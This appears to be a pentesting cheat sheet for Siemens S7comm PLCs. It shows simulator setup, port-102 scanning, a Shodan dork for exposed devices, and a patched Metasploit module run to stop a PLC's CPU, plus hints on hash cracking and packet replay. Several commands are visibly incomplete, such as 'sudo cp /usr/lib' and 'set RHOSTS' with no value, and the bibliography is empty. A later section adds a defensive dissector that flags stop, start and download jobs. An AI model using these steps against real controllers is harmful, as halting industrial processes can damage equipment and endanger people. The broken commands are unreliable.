Pentesting ICS (S7comm)

What is S7comm?

Siemens S7 PLC simulator

If you want to play around, you can install an S7 simulator written in Python:

  1. Download snap7-full-x.x.x.zip
  2. Unzip it as snap7-full in ~/
  3. Execute the following commands:
$ cd ~/snap7-full
$ sudo apt-get install python-pip
$ sudo -H pip install python-snap7
$ cd build/unix
$ make -f
$ cd ../bin/x86_64-linux/
$ sudo cp /usr/lib
$ sudo ldconfig
$ sudo python
>>> import snap7
>>> s7server = snap7.server.Server()
>>> s7server.create()
>>> s7server.start()
>>> s7server.get_status()
('SrvRunning', 'S7CpuStatusRun', 0)

Now the simulator is ready!


Nmap scan:

nmap --script s7-info.nse -p 102 <host/s>

Shodan dork: port:102

Scan and identify:

#Example usage --timeout 2 --hosts-list hosts.txt

Using Nmap with the script s7-info.nse:

nmap --script s7-info.nse -p 102


There should also be some Metasploit modules:

$ searchsploit Siemens Simatic S7

Add exploit 19831.rb to metasploit:

Metasploit comes with a ton of exploits already included; however, this Siemens exploit needs to be added. As the exploit was written with Metasploit in mind, this is a simple task. To add the module, first patch the file as described, then run the commands on the Kali Linux VM:

To work with a newer Metasploit framework, one line in the 19831.rb file needs to be changed. In the file, take a look at line 39:

```ruby
'MODE', [false, 'Set true to put the CPU back into RUN mode.', false]),
```

Change the preceding to this:

```ruby
'MODE', [false, 'Mode 1 to Stop CPU. Set Mode to 2 to put the CPU back into RUN mode.', 1]),
```

Now copy module to msf user directory:

$ cd ~/.msf4/modules/
~/.msf4/modules $ mkdir -p auxiliary/hardware/scada
~/.msf4/modules $ cd auxiliary/hardware/scada
~/.msf4/modules/auxiliary/hardware/scada $ cp /usr/share/exploitdb/platforms/hardware/remote/19831.rb 19831.rb
~/.msf4/modules/auxiliary/hardware/scada $ service postgresql start
~/.msf4/modules/auxiliary/hardware/scada $ msfconsole

Now go with metasploit:

msf > reload_all
msf > search siemens
msf > use auxiliary/hardware/scada/19831
msf auxiliary(19831) > show options
msf auxiliary(19831) > set RHOSTS
msf auxiliary(19831) > exploit
[+] PLC is running, iso-tsap port is open.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Newer Siemens devices added a password for certain actions! Extract the hash and crack it online!

Manual exploitation

Intercept the traffic, then replay the packets and so on!
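The Metasploit module above works by sending S7comm "PLC Stop" / "PLC Control" jobs over iso-tsap (port 102), and the manual approach replays captured packets of the same kind. From the defender's side, the useful skill is recognising those jobs in a capture. The following dissector is an added example, not code from this page or from any of the tools it mentions: it walks TPKT -> COTP -> S7comm, names the job function code, pulls out the PI service name for stop/start requests, and flags the frames that change CPU state or the loaded program. The function codes and header layout are the public ones used by the Wireshark S7comm dissector; the sample frames are constructed by hand, not a real capture.

```python
import struct

# S7comm job/ack parameter function codes, as named in the public Wireshark
# dissector. Only the codes relevant here are listed.
S7_FUNCTIONS = {
    0x00: "CPU services",
    0x04: "Read Var",
    0x05: "Write Var",
    0x1A: "Request download",
    0x1B: "Download block",
    0x1C: "Download ended",
    0x1D: "Start upload",
    0x1E: "Upload",
    0x1F: "End upload",
    0x28: "PI-Service (PLC Control)",
    0x29: "PLC Stop",
    0xF0: "Setup communication",
}
# Functions that change CPU state or the running program: the ones a
# monitoring rule for port 102 should alert on.
CONTROL_FUNCTIONS = {0x05, 0x1A, 0x1B, 0x1C, 0x28, 0x29}
ROSCTR = {1: "Job", 2: "Ack", 3: "Ack_Data", 7: "Userdata"}
COTP_TYPES = {0xE0: "CR", 0xD0: "CC", 0xF0: "DT"}


def _pi_service(func, param):
    """Pull the PI service name (e.g. P_PROGRAM) out of a 0x28/0x29 parameter block."""
    if func == 0x29:          # 1 func + 5 reserved + 1 len + name
        n = param[6]
        return param[7:7 + n].decode("ascii", "replace")
    if func == 0x28:          # 1 func + 7 reserved + 2-byte block len + block + 1 len + name
        blk = struct.unpack(">H", param[8:10])[0]
        n = param[10 + blk]
        return param[11 + blk:11 + blk + n].decode("ascii", "replace")
    return None


def parse_s7(frame: bytes) -> dict:
    """Dissect TPKT -> COTP -> S7comm header and return the PDU's function code."""
    if len(frame) < 7 or frame[0] != 0x03:
        raise ValueError("not a TPKT frame")
    tpkt_len = struct.unpack(">H", frame[2:4])[0]
    if tpkt_len != len(frame):
        raise ValueError(f"TPKT length {tpkt_len} != frame length {len(frame)}")
    cotp_len, cotp_type = frame[4], frame[5]
    info = {"cotp": COTP_TYPES.get(cotp_type, hex(cotp_type)), "rosctr": None,
            "function": None, "name": None, "pi_service": None}
    if cotp_type != 0xF0:
        return info           # CR/CC carry no S7comm payload
    s7 = frame[5 + cotp_len:]
    if len(s7) < 10 or s7[0] != 0x32:
        raise ValueError("no S7comm header after COTP")
    rosctr = s7[1]
    pdu_ref, param_len, data_len = struct.unpack(">HHH", s7[4:10])
    hdr_len = 12 if rosctr in (2, 3) else 10   # Ack/Ack_Data add error class + code
    param = s7[hdr_len:hdr_len + param_len]
    if len(param) != param_len:
        raise ValueError("truncated parameter block")
    info.update(rosctr=ROSCTR.get(rosctr, rosctr), pdu_ref=pdu_ref,
                param_len=param_len, data_len=data_len)
    if rosctr == 7 or not param:
        return info           # Userdata uses a different parameter layout
    func = param[0]
    info["function"] = func
    info["name"] = S7_FUNCTIONS.get(func, f"unknown 0x{func:02x}")
    info["pi_service"] = _pi_service(func, param)
    return info


def audit_frames(frames):
    """Return one alert per frame that carries a state- or program-changing Job."""
    alerts = []
    for i, frame in enumerate(frames):
        info = parse_s7(frame)
        if info["rosctr"] == "Job" and info["function"] in CONTROL_FUNCTIONS:
            alerts.append({"frame": i, "name": info["name"], "pi_service": info["pi_service"]})
    return alerts


# Constructed sample session (not a real capture): setup, its ack, a DB read,
# then a PLC Stop and a PLC Control (start) job, both naming the PI service P_PROGRAM.
SAMPLE_FRAMES = [bytes.fromhex(h) for h in (
    "0300001902f08032010000000100080000f0000001000101e0",                 # Job: Setup communication
    "0300001b02f080320300000001000800000000f0000001000100f0",             # Ack_Data: Setup communication
    "0300001f02f080320100000002000e00000401120a10020001000184000000",     # Job: Read Var (DB1.DBB0)
    "0300002102f08032010000000300100000290000000000" "09505f50524f4752414d",           # Job: PLC Stop
    "0300002502f08032010000000400140000" "28000000000000fd0000" "09505f50524f4752414d",  # Job: PLC Control
)]

if __name__ == "__main__":
    for i, f in enumerate(SAMPLE_FRAMES):
        p = parse_s7(f)
        print(i, p["rosctr"], p["name"], p["pi_service"])
    for a in audit_frames(SAMPLE_FRAMES):
        print("ALERT:", a)
```

Run over the sample session it reports frames 3 and 4 (the stop and start jobs) and stays quiet on the setup handshake and the read. Fed with frames from a real port-102 capture, the same audit gives an ICS monitoring team a concrete list of when someone tried to stop, start or reprogram a CPU.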


Resources and bibliography:

Good to read: